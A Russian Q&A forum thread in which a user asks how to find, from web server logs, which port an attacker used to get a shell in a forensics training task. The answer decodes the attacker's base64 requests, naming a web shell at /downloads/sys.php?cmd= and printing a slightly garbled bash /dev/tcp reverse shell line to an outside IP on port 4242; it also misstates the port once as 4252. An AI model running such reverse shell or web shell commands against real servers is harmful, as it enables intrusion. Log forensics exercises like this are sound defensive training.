Задать вопрос
nykakdelishki
@nykakdelishki
Системный аналитик

Как определить с какого порта происходит несанкционированный доступ по логам?

Текст задания:
В результате кибератаки на сайт организации нарушителю удалось загрузить в папку downloads файл, позволяющий исполнять произвольный код на сервере с привилегией процесса Web-сервера. Затем, используя загруженный ранее файл, исполнив ряд команд, нарушитель получил доступ над оболочкой сервера. Определите номер использованного для получения доступа порта. Ответ запишите в виде натурального числа.

Логи:
6365cb782236d899474135.jpeg
6365cbcd135b9044533201.jpeg

Правильный ответ 4242, хотя я такой цифры вообще в этих логах не нашел...
  • Вопрос задан
  • 331 просмотр
Подписаться 1 Простой 4 комментария
Решения вопроса 1
firedragon
@firedragon
Не джун-мидл-сеньор, а трус-балбес-бывалый.
смотрите за адресом
176.59.41.128
Первый запрос загрузка эксплоита расшифруйте онлайн энкодером base64 строку
Второй запрос /downloads/sys.php?cmd=
После равно идет строка, видимо тоже в base64 расшифруйте там будет что то типа
./shell.sh s4242

Как я и предполагал получилось следующее
https://www.base64decode.org/
скрин нечеткий поэтому появился иероглиф, но как видим четко виден адрес и порт, собственно адрес атакуещего, а порт как видите 4252 плюс перенаправление потоков ввода вывода
/in/bash -l >P/dev葉cp/176.59.41.128/4242 0<&1 2>&1
Ответ написан
Пригласить эксперта
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Похожие вопросы